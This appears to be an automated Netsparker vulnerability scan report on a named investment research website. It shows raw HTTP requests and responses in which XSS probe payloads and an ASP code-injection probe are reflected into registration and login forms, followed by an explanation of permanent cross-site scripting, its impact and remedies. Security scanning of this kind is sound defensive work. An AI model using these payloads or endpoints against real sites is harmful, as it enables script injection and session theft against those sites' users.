<option value="MT">Montana</option>
<option value="NE">Nebraska</option>
<option value="NV">Nevada</option>
<option value="NH">New Hampshire</option>
<option value="NJ">New Jersey</option>
<option value="NM">New Mexico</option>
<option value="NY">New York</option>
<option value="NC">North Carolina</option>
<option value="ND">North Dakota</option>
<option value="OH">Ohio</option>
<option value="OK">Oklahoma</option>
<option value="OR">Oregon</option>
<option value="PA">Pennsylvania</option>
<option value="RI">Rhode Island</option>
<option value="SC">South Carolina</option>
<option value="SD">South Dakota</option>
<option value="TN">Tennessee</option>
<option value="TX">Texas</option>
<option value="UT">Utah</option>
<option value="VT">Vermont</option>
<option value="VI">Virgin Islands</option>
<option value="VA">Virginia</option>
<option value="WA">Washington</option>
<option value="WV">West Virginia</option>
<option value="WI">Wisconsin</option>
<option value="WY">Wyoming</option>
<option value="PR">Puerto Rico</option>
<option value="GU">Guam</option>
</select></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Zip Code: <font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="zip" type="text" id="zip" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Country:
</td>
<td colspan="2" align="left">
<input name="country" type="text" id="country" size="35" value="3">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Phone Number: <font color="#FF0000">*</font></td>
<td colspan="2" align="left">
<input name="phone" type="text" id="phone" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
E-mail address: <font color="#FF0000">*</font></td>
<td colspan="2" align="left">

<input name="email" type="text" id="email" size="35" value="<% response.write(268409241-22) %>">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font"><font color="#FF0000">EMAIL DOES NOT MATCH<br>
Retype E-mail address:*</font></td>
<td colspan="2" align="left">
<font color="#FF0000">
<input name="reEmail" type="text" id="reEmail" size="35"> &nbsp;&nbsp;&nbsp;&nbsp;<b><<</b></font>
</td>
</tr>


<tr align="left" valign="top" class="mid_font">
<td colspan="3" class="mid_font">
Would you prefer to be contacted by e-mail or phone?


<input name="contact" type="radio" value="e-mail">
E-mail
<input name="contact" type="radio" value="phone"checked>
Phone <br><br>
</td>
</tr>


<tr align="left" valign="top" bgcolor="#eeeeee" class="mid_font">
<td colspan="3" class="mid_font"><strong>Guest Information </strong></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Guest First name:
</td>
<td colspan="2" align="left">


<input name="gfirstname" type="text" id="gfirstname" size="35" value="Smith">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Guest Last name:
</td>
<td colspan="2" al..
- /forms/palConference.asp

/forms/palConference.asp

Parameters

Parameter Type Value
error GET email
address1 POST "><net sparker=alert(0x00555C)>

Request

GET /forms/palConference.asp?error=email HTTP/1.1
Referer: http://www.stansberryresearch.com/stp_ircs/feedback/pal_registration.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=KIBOLMLBFJNMBKJLOPHJEKDM; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=PDHBMFABJECPGMDKHDAMPFEO; Overseas+0611=Overseas+0611; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d00000000000000000000000000
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:53:02 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 20108
Content-Type: text/html
Cache-control: private




<html>
<head>
<title>Stansberry & Associates</title>
<link rel="stylesheet" href="/secure/includes/css.css" type="text/css" />
<script language="JavaScript" src="/forms/includes/javascript/date_validation.js"></script>
<script language="JavaScript" src="/forms/includes/javascript/CalendarPopup.js"></script>
<script language="JavaScript">
var cal = new CalendarPopup();
</script>
<script language="javascript"
type="text/javascript">

function validateForm(pal)
{

if(""==document.forms.pal.firstname.value)
{
alert("Please enter your first name.");
return false;
}
if(""==document.forms.pal.lastname.value)
{
alert("Please enter your last name.");
return false;
}
if(""==document.forms.pal.address1.value)
{
alert("Please enter your address.");
return false;
}
if(""==document.forms.pal.city.value)
{
alert("Please enter city.");
return false;
}
if(""==document.forms.pal.zip.value)
{
alert("Please enter zip code.");
return false;
}
if(""==document.forms.pal.phone.value)
{
alert("Please enter your phone number.");
return false;
}

if(""==document.forms.pal.email.value)
{
alert("Please enter your email address.");
return false;
}
}
</script>




<script language="JavaScript">
function setVisibility(id, visibility) {
document.getElementById(id).style.display = visibility;
}
</script>


</head>
<body bgcolor="#CCCCCC">
<table width="625" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="left" valign="top"><div align="center"><img src="/secure/images/pal_header.gif" border="0"></div></td>
</tr>
<tr>
<td><table width="600" border="0" align="center" cellpadding="3" cellspacing="0">
<tr><td bgcolor="#999999">&nbsp;
</td>
</tr>
</table>
</td>

</tr>
<tr>
<td>
<table width="600" border="0" align="center" cellpadding="10" cellspacing="0">
<tr>
<td align="center" valign="top" class="mid_font">
<b>2009 Alliance Registration Form</b><br>
<b>Monday, November 9th, 2009</b><br><br>
<b><font color="FF0000">You must register by Friday, August 28<sup>th</sup> to guarantee your spot.</font></b>

<form action="/stp_ircs/feedback/pal_registration.asp" method="post" name="pal" id="pal" onSubmit="return validateForm(pal);">
<table width="100%" border="0" cellpadding="5" cellspacing="0" class="border">
<tr align="left" valign="top" bgcolor="#eeeeee" class="mid_font">
<td colspan="2" class="mid_font"><strong><font size="2">Personal Information </strong></td>
<td width="22%" class="mid_font"><div align="right"><strong><font color="#FF0000" size="1" face="Verdana, Arial, Helvetica, sans-serif">* Required Field</strong></div></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td width="31%" class="mid_font">

Title:
</td>
<td colspan="2" align="left">

<select name="title" id="title">

<option value=""></option>

<option value="Dr.">Dr.</option>
<option value="Mr.">Mr.</option>
<option value="Mrs.">Mrs.</option>
<option value="Ms.">Ms.</option>
<option value="Miss.">Miss.</option>
<option value="Pr.">Pr.</option>
<option value="Prof.">Prof.</option>
</select>

</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td width="31%" class="mid_font">

First name:
<font color="#FF0000">*</font></td>
<td colspan="2" align="left">


<input name="firstname" type="text" id="firstname" size="35" value="Smith">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Last name:
<font color="#FF0000">*</font></td>
<td colspan="2" align="left">

<input name="lastname" type="text" id="lastname" size="35" value="Smith">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Address 1: <font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="address1" type="text" id="address1" size="35" value=""><net sparker=netsparker(0x00555C)>">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Address 2:
</td>
<td colspan="2" align="left">
<input name="address2" type="text" id="address2" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
City:<font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="city" type="text" id="city" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">State:
</td>
<td colspan="2" align="left">
<select name="state_" size="1" id="state_">


<option value="3">3</option>


<option value="">----------------------------------------------------</option>
<option value="AA">Armed Forces America</option>
<option value="AE">Armed Forces Europe</option>
<option value="AP">Armed Forces Pacific</option>
<option value="AL">Alabama</option>
<option value="AK">Alaska</option>
<option value="AZ">Arizona</option>
<option value="AR">Arkansas</option>
<option value="CA">California</option>
<option value="CO">Colorado</option>
<option value="CT">Connecticut</option>
<option value="DE">Delaware</option>
<option value="DC">District of Columbia</option>
<option value="FL">Florida</option>
<option value="GA">Georgia</option>
<option value="HI">Hawaii</option>
<option value="ID">Idaho</option>
<option value="IL">Illinois</option>
<option value="IN">Indiana</option>
<option value="IA">Iowa</option>
<option value="KS">Kansas</option>
<option value="KY">Kentucky</option>
<option value="LA">Louisiana</option>
<option value="ME">Maine</option>
<option value="MD">Maryland</option>
<option value="MA">Massachusetts</option>
<option value="MI">Michigan</option>
<option value="MN">Minnesota</option>
<option value="MS">Mississippi</option>
<option value="MO">Missouri</option>
<option value="MT">Montana</option>
<option value="NE">Nebraska</option>
<option value="NV">Nevada</option>
<option value="NH">New Hampshire</option>
<option value="NJ">New Jersey</option>
<option value="NM">New Mexico</option>
<option value="NY">New York</option>
<option value="NC">North Carolina</option>
<option value="ND">North Dakota</option>
<option value="OH">Ohio</option>
<option value="OK">Oklahoma</option>
<option value="OR">Oregon</option>
<option value="PA">Pennsylvania</option>
<option value="RI">Rhode Island</option>
<option value="SC">South Carolina</option>
<option value="SD">South Dakota</option>
<option value="TN">Tennessee</option>
<option value="TX">Texas</option>
<option value="UT">Utah</option>
<option value="VT">Vermont</option>
<option value="VI">Virgin Islands</option>
<option value="VA">Virginia</option>
<option value="WA">Washington</option>
<option value="WV">West Virginia</option>
<option value="WI">Wisconsin</option>
<option value="WY">Wyoming</option>
<option value="PR">Puerto Rico</option>
<option value="GU">Guam</option>
</select></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Zip Code: <font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="zip" type="text" id="zip" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Country:
</td>
<td colspan="2" align="left">
<input name="country" type="text" id="country" size="35" value="3">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Phone Number: <font color="#FF0000">*</font></td>
<td colspan="2" align="left">
<input name="phone" type="text" id="phone" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
E-mail address: <font color="#FF0000">*</font></td>
<td colspan="2" align="left">

<input name="email" type="text" id="email" size="35" value="<% response.write(268409241-22) %>">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font"><font color="#FF0000">EMAIL DOES NOT MATCH<br>
Retype E-mail address:*</font></td>
<td colspan="2" align="left">
<font color="#FF0000">
<input name="reEmail" type="text" id="reEmail" size="35"> &nbsp;&nbsp;&nbsp;&nbsp;<b><<</b></font>
</td>
</tr>


<tr align="left" valign="top" class="mid_font">
<td colspan="3" class="mid_font">
Would you prefer to be contacted by e-mail or phone?


<input name="contact" type="radio" value="e-mail">
E-mail
<input name="contact" type="radio" value="phone"checked>
Phone <br><br>
</td>
</tr>


<tr align="left" valign="top" bgcolor="#eeeeee" class="mid_font">
<td colspan="3" class="mid_font"><strong>Guest Information </strong></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Guest First name:
</td>
<td colspan="2" align="left">


<input name="gfirstname" type="text" id="gfirstname" size="35" value="Smith">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Guest Last name:
</td>
..
- /forms/palConference.asp

/forms/palConference.asp

Parameters

Parameter Type Value
error GET email
requests POST '><net sparker=alert(0x005755)>

Request

GET /forms/palConference.asp?error=email HTTP/1.1
Referer: http://www.stansberryresearch.com/stp_ircs/feedback/pal_registration.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=OLBOLMLBJNMPDOJIKBPKNADM; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=EHHBMFABANKAIOBIIBKGHDCM; Overseas+0611=Overseas+0611; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d00000000000000000000000000
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:57:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 20109
Content-Type: text/html
Cache-control: private




<html>
<head>
<title>Stansberry & Associates</title>
<link rel="stylesheet" href="/secure/includes/css.css" type="text/css" />
<script language="JavaScript" src="/forms/includes/javascript/date_validation.js"></script>
<script language="JavaScript" src="/forms/includes/javascript/CalendarPopup.js"></script>
<script language="JavaScript">
var cal = new CalendarPopup();
</script>
<script language="javascript"
type="text/javascript">

function validateForm(pal)
{

if(""==document.forms.pal.firstname.value)
{
alert("Please enter your first name.");
return false;
}
if(""==document.forms.pal.lastname.value)
{
alert("Please enter your last name.");
return false;
}
if(""==document.forms.pal.address1.value)
{
alert("Please enter your address.");
return false;
}
if(""==document.forms.pal.city.value)
{
alert("Please enter city.");
return false;
}
if(""==document.forms.pal.zip.value)
{
alert("Please enter zip code.");
return false;
}
if(""==document.forms.pal.phone.value)
{
alert("Please enter your phone number.");
return false;
}

if(""==document.forms.pal.email.value)
{
alert("Please enter your email address.");
return false;
}
}
</script>




<script language="JavaScript">
function setVisibility(id, visibility) {
document.getElementById(id).style.display = visibility;
}
</script>


</head>
<body bgcolor="#CCCCCC">
<table width="625" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="left" valign="top"><div align="center"><img src="/secure/images/pal_header.gif" border="0"></div></td>
</tr>
<tr>
<td><table width="600" border="0" align="center" cellpadding="3" cellspacing="0">
<tr><td bgcolor="#999999">&nbsp;
</td>
</tr>
</table>
</td>

</tr>
<tr>
<td>
<table width="600" border="0" align="center" cellpadding="10" cellspacing="0">
<tr>
<td align="center" valign="top" class="mid_font">
<b>2009 Alliance Registration Form</b><br>
<b>Monday, November 9th, 2009</b><br><br>
<b><font color="FF0000">You must register by Friday, August 28<sup>th</sup> to guarantee your spot.</font></b>

<form action="/stp_ircs/feedback/pal_registration.asp" method="post" name="pal" id="pal" onSubmit="return validateForm(pal);">
<table width="100%" border="0" cellpadding="5" cellspacing="0" class="border">
<tr align="left" valign="top" bgcolor="#eeeeee" class="mid_font">
<td colspan="2" class="mid_font"><strong><font size="2">Personal Information </strong></td>
<td width="22%" class="mid_font"><div align="right"><strong><font color="#FF0000" size="1" face="Verdana, Arial, Helvetica, sans-serif">* Required Field</strong></div></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td width="31%" class="mid_font">

Title:
</td>
<td colspan="2" align="left">

<select name="title" id="title">

<option value=""></option>

<option value="Dr.">Dr.</option>
<option value="Mr.">Mr.</option>
<option value="Mrs.">Mrs.</option>
<option value="Ms.">Ms.</option>
<option value="Miss.">Miss.</option>
<option value="Pr.">Pr.</option>
<option value="Prof.">Prof.</option>
</select>

</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td width="31%" class="mid_font">

First name:
<font color="#FF0000">*</font></td>
<td colspan="2" align="left">


<input name="firstname" type="text" id="firstname" size="35" value="Smith">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Last name:
<font color="#FF0000">*</font></td>
<td colspan="2" align="left">

<input name="lastname" type="text" id="lastname" size="35" value="Smith">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Address 1: <font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="address1" type="text" id="address1" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Address 2:
</td>
<td colspan="2" align="left">
<input name="address2" type="text" id="address2" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
City:<font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="city" type="text" id="city" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">State:
</td>
<td colspan="2" align="left">
<select name="state_" size="1" id="state_">


<option value="3">3</option>


<option value="">----------------------------------------------------</option>
<option value="AA">Armed Forces America</option>
<option value="AE">Armed Forces Europe</option>
<option value="AP">Armed Forces Pacific</option>
<option value="AL">Alabama</option>
<option value="AK">Alaska</option>
<option value="AZ">Arizona</option>
<option value="AR">Arkansas</option>
<option value="CA">California</option>
<option value="CO">Colorado</option>
<option value="CT">Connecticut</option>
<option value="DE">Delaware</option>
<option value="DC">District of Columbia</option>
<option value="FL">Florida</option>
<option value="GA">Georgia</option>
<option value="HI">Hawaii</option>
<option value="ID">Idaho</option>
<option value="IL">Illinois</option>
<option value="IN">Indiana</option>
<option value="IA">Iowa</option>
<option value="KS">Kansas</option>
<option value="KY">Kentucky</option>
<option value="LA">Louisiana</option>
<option value="ME">Maine</option>
<option value="MD">Maryland</option>
<option value="MA">Massachusetts</option>
<option value="MI">Michigan</option>
<option value="MN">Minnesota</option>
<option value="MS">Mississippi</option>
<option value="MO">Missouri</option>
<option value="MT">Montana</option>
<option value="NE">Nebraska</option>
<option value="NV">Nevada</option>
<option value="NH">New Hampshire</option>
<option value="NJ">New Jersey</option>
<option value="NM">New Mexico</option>
<option value="NY">New York</option>
<option value="NC">North Carolina</option>
<option value="ND">North Dakota</option>
<option value="OH">Ohio</option>
<option value="OK">Oklahoma</option>
<option value="OR">Oregon</option>
<option value="PA">Pennsylvania</option>
<option value="RI">Rhode Island</option>
<option value="SC">South Carolina</option>
<option value="SD">South Dakota</option>
<option value="TN">Tennessee</option>
<option value="TX">Texas</option>
<option value="UT">Utah</option>
<option value="VT">Vermont</option>
<option value="VI">Virgin Islands</option>
<option value="VA">Virginia</option>
<option value="WA">Washington</option>
<option value="WV">West Virginia</option>
<option value="WI">Wisconsin</option>
<option value="WY">Wyoming</option>
<option value="PR">Puerto Rico</option>
<option value="GU">Guam</option>
</select></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Zip Code: <font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="zip" type="text" id="zip" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Country:
</td>
<td colspan="2" align="left">
<input name="country" type="text" id="country" size="35" value="3">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Phone Number: <font color="#FF0000">*</font></td>
<td colspan="2" align="left">
<input name="phone" type="text" id="phone" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
E-mail address: <font color="#FF0000">*</font></td>
<td colspan="2" align="left">

<input name="email" type="text" id="email" size="35" value="<% response.write(268409241-22) %>">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font"><font color="#FF0000">EMAIL DOES NOT MATCH<br>
Retype E-mail address:*</font></td>
<td colspan="2" align="left">
<font color="#FF0000">
<input name="reEmail" type="text" id="reEmail" size="35"> &nbsp;&nbsp;&nbsp;&nbsp;<b><<</b></font>
</td>
</tr>


<tr align="left" valign="top" class="mid_font">
<td colspan="3" class="mid_font">
Would you prefer to be contacted by e-mail or phone?


<input name="contact" type="radio" value="e-mail">
E-mail
<input name="contact" type="radio" value="phone"checked>
Phone <br><br>
</td>
</tr>


<tr align="left" valign="top" bgcolor="#eeeeee" class="mid_font">
<td colspan="3" class="mid_font"><strong>Guest Information </strong></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Guest First name:
</td>
<td colspan="2" align="left">


<input name="gfirstname" type="text" id="gfirstname" size="35" value="Smith">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Guest Last name:
</td>
<td colspan="2" al..
Permanent Cross-site Scripting

Permanent Cross-site Scripting

14 TOTAL
IMPORTANT
CONFIRMED
14

Netsparker confirmed this vulnerability by analyzing the execution of injected JavaScript.

Permanent XSS (Cross-site Scripting) allows an attacker to execute dynamic scripts (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly and to steal the user's credentials. This happens because the input entered by the user has been interpreted by HTML/Javascript/VbScript within the browser.

Permanent means that the attack will be stored in the back-end system. In normal XSS attacks an attack needs to e-mail the victim but in a permanent XSS an attacker can just execute the attack and wait for users to see the affected page. As soon as someone visits the page, the attacker's stored payload will get executed.

XSS targets the users of the application instead of the server. Although this is a limitation, since it only allows attackers to hijack other users' session the attacker might attack an administrator to gain full control over the application.

Impact

Permanent XSS is a dangerous issue that has many exploitation vectors, some of which includes:
  • User session sensitive information such as cookies can be stolen.
  • XSS can enable client-side worms which could modify, delete or steal other users' data within the application.
  • The website can be redirected to a new location, defaced or used as a phishing site.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

Classification

- /pub/digest/archive/index.asp

/pub/digest/archive/index.asp CONFIRMED

Injection URL

http://www.stansberryresearch.com/responses/sign_in_error.asp

Injection Request

GET /responses/sign_in_error.asp HTTP/1.1
Referer: http://www.stansberryresearch.com/pub/digest/archive/2008/html/fda_essays.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=GEPNLMLBKNENIJCFCEJJFONJ; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=HMFBMFABKIKCAIHLCIOCILBL
Accept-Encoding: gzip, deflate

Identification Request

GET /pub/digest/archive/index.asp HTTP/1.1
Referer: http://www.stansberryresearch.com/sitemap.xml
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=GEPNLMLBKNENIJCFCEJJFONJ; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=HMFBMFABKIKCAIHLCIOCILBL
Accept-Encoding: gzip, deflate

Injection Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:45:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 12205
Content-Type: text/html
Cache-control: private



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Stansberry & Associates Investment Research</title>
<link rel="stylesheet" href="/includes/css.css" type="text/css" />
</head>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<SCRIPT LANGUAGE="JavaScript" src="http://oascentral.stansberryresearch.com/Scripts/oas_analytics.js"></SCRIPT>
<script language="JavaScript">
var RN = new String (Math.random());
var RNS = RN.substring (2,11);
var oas_jx_sitepage = "stansberry/cover";
//<!�- Define Custom Reporting Taxonomy, format is: '&Attribute1=Value1&Attribute2=Value2' -->
var OAS_taxonomy='custom=' + oas_jx_sitepage;
var OAS_query='';
OAS_query += 'XE' + '&' + OAS_taxonomy + OAS_rdl + "&if_nt_CookieAccept=" + OAS_CA + '&XE';
// -->
</script>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td width="427" rowspan="2"><a href="/"><img src="/images/top_logo.gif" alt="Stansberry & Associates Investment Research" width="427" height="103" border="0"></a></td>
<td width="360" height="82" align="right" valign="middle"><a href="http://signups.harborpublishing.com/fsm/signups/signup/538.html" target="_new"><img src="/images/stars_arrow.gif" border="0"></a></td>
<td width="13" align="right" valign="middle">&nbsp;</td>
</tr>
<tr>
<td colspan="2" align="right" valign="bottom"><table width="100%" border="0" align="center" cellpadding="3" cellspacing="0" class="top_font">
<tr>
<td align="right" valign="bottom"><div align="right">Customer Service: 1-888-261-2693 | <a href="/website_overview.asp" target="_blank">Website Overview</a></div></td>
<td width="6" align="right" valign="bottom">&nbsp;</td>
</tr>
</table></td>
</tr>
</table>
<table width="798" border="0" align="center" cellpadding="0" cellspacing="0">
<tr align="left" valign="top">
<td><div align="left"><a href="/"><img src="/images/home_button.gif" alt="Home" width="70" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/editors.asp"><img src="/images/editors_button.gif" alt="Meet The Editors" width="129" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/products.asp"><img src="/images/products_btn.gif" alt="In The News" width="112" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/schedule.asp"><img src="/images/pubsched_button.gif" alt="Investment Research Publishing Schedule" width="155" height="38" border="0"></a></div></td>
<td><div align="left"><a href="/contact.asp"><img src="/images/contact_button_main.gif" alt="Contact Us" width="159" height="38" border="0"></a></div></td>
<td><div align="left"><img src="/images/login_button.gif" alt="Subscriber Login" width="173" height="38" border="0"></div></td>
</tr>
</table><script language="javascript" type="text/javascript">
// <!CDATA[

function Submit1_onclick() {

}

// ]]>
</script>



<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>
<table width="625" border="0" cellpadding="0" cellspacing="0">
<tr>
<td><script language="JavaScript">
<!--
var oas_jx_pos = "Top";
document.write("<scr" + "ipt language=\"JavaScript\" src=\"http://oascentral.stansberryresearch.com/RealMedia/ads/adstream_jx.ads/" +
oas_jx_sitepage + "/1" + RNS + "@" + oas_jx_pos + '?' + OAS_query + "\"></scr" + "ipt>");
// -->
</script></td>
</tr>
</table></td>
<td width="200" align="left" valign="middle"><table width="100%" border="0" cellpadding="5" cellspacing="0">
<tr>
<td><!--<form action="/ICA/Default.aspx" method="post">-->
<!-- <form action="/test1/Default.aspx" method="post">-->
<form action="/ICA/default.aspx" method="post">
<table width="100%" border="0" align="right" cellpadding="2" cellspacing="0" class="top_font">
<tr>
<td >User Name:
<input name="username" type="text" id="username" size="22"></td>
</tr>
<tr>
<td>Password:
<input name="password" type="password" id="password" size="22">
<input name="ref" type="hidden" value="/pub/digest/archive/2008/html/fda_essays/'"--></style></script><script>netsparker(0x002A72)</script>">
</td>
</tr>
<tr>
<td ><div align="left">
<p><input name="Submit" type="submit" class="top_font" value="Login" id="Submit1" onclick="return Submit1_onclick()">
<a href="/responses/forgot_password.asp">Forgot Password?</a></p>
</div></td>
</tr>
</table>
</form></td>
</tr>
</table></td>
</tr>
</table>
<TABLE id=main cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<hr align="center" width="775" size="1" noshade>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>

<div align="center">
<P align=center class="mid_font"><B>Please Log In </B></P>
<table width="42%" border="0" cellspacing="0" cellpadding="2">
<tr align="left" valign="top">
<td><u><span class="mid_font"><FONT color=#990000><FONT
color=#666666><font color="#000000"><B>Remember:</B></font></FONT></FONT></span></u></td>
</tr>

</table>
<P align=center class="mid_font">You must have an S&amp;A subscription to access this section. <BR>
To learn more about our publications, visit our <a href="/">home page</a>. </P>
<P align=center class="mid_font">If you are already a subscriber, check your user name and password and try logging in again. <br>
Or contact customer service at 1-888-261-2693.<font color="#FF0000"><strong> </strong></font></P>
<P align=center class="mid_font">Thank you.</P>
<P align=center class="mid_font"><FONT color=#990000><B><FONT
color=#666666><BR>
</FONT></B></FONT></P>
</div>

</td>
</tr>
</table>
<TABLE cellSpacing=0 cellPadding=3 width=800 align=center
bgColor=#ffffff>
<TBODY>
<TR>
<TD vAlign=top align=left height=21><DIV align=center>
<DIV align=center>
<DIV align=left>
<DIV align=left>
<DIV align=left>
<div align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif"
size=2><img src="/images/bottom_border.gif" width="798" height="24"></FONT></div>
</DIV>
</DIV>
</DIV>
</DIV>
</DIV></TD>
</TR>
</TBODY>
</TABLE>
<table width="800" border="0" align="center" cellpadding="0" cellspacing="0" id="main">
<tr>
